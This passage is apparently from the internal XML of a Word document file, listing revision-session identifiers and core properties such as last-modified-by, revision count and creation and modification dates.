    <w:rsid w:val="00B72EC1"/>
    <w:rsid w:val="00BA789C"/>
    <w:rsid w:val="00BB66A4"/>
    <w:rsid w:val="00C129F7"/>
    <w:rsid w:val="00C16DF3"/>
    <w:rsid w:val="00C41552"/>
    <w:rsid w:val="00C716C3"/>
    <w:rsid w:val="00C8108F"/>
    <w:rsid w:val="00CB7B7B"/>
    <w:rsid w:val="00D51CFE"/>
    <w:rsid w:val="00D8402F"/>
    <w:rsid w:val="00DC4675"/>
    <w:rsid w:val="00DD1AD8"/>
    <w:rsid w:val="00E04EEA"/>
    <w:rsid w:val="00E06129"/>
    <w:rsid w:val="00E27F7B"/>
    <w:rsid w:val="00E7109D"/>
    <w:rsid w:val="00EA1295"/>
    <w:rsid w:val="00EC5FE4"/>
    <w:rsid w:val="00F00402"/>
    <w:rsid w:val="00F71F8F"/>
    <w:rsid w:val="00F8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C00B7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CC88C-B6C9-46D5-8D98-0883423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1460592649@qq.com</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-15T01:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-07T14:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>